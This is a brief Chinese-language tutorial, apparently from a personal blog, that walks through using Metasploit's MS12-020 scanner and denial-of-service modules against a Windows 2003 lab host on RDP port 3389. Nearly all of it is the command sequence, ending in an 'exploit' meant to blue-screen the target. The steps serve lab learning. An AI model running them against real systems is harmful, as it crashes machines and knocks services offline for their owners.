利用条件:受害者主机需要开启3389端口,漏洞是利用ms12_020

测试环境:

kali-linux: 192.168.2.146
Windows2003:192.168.2.107

首先还是打开metasploit

msfconsole
search ms12_020 //搜索相关模块
返回信息给出两个模块:
auxiliary/scanner/rdp/ms12_020_check //漏洞的扫描检测模块

auxiliary/dos/windows/rdp/ms12_020_maxchannelids //漏洞的攻击利用模块

use auxiliary/scanner/rdp/ms12_020_check //使用漏洞检查模块

show options //查看设置选项

set RHOSTS 192.168.2.107 //设置受害者的IP地址,这里线程采用了默认

exploit //执行检测

若检测存在,那么使用“use auxiliary/dos/windows/rdp/ms12_020_maxchannelids”,进入:
msf auxiliary(ms12_020_maxchannelids) > 

show options //查看设置选项

set RHOST 192.168.2.107 //设置受害者的IP地址,端口是默认的3389

exploit //执行蓝屏攻击
最后修改:2021 年 04 月 10 日

感谢看完,可以点个赞~请作者喝杯咖啡~ヾ(◍°∇°◍)ノ゙❤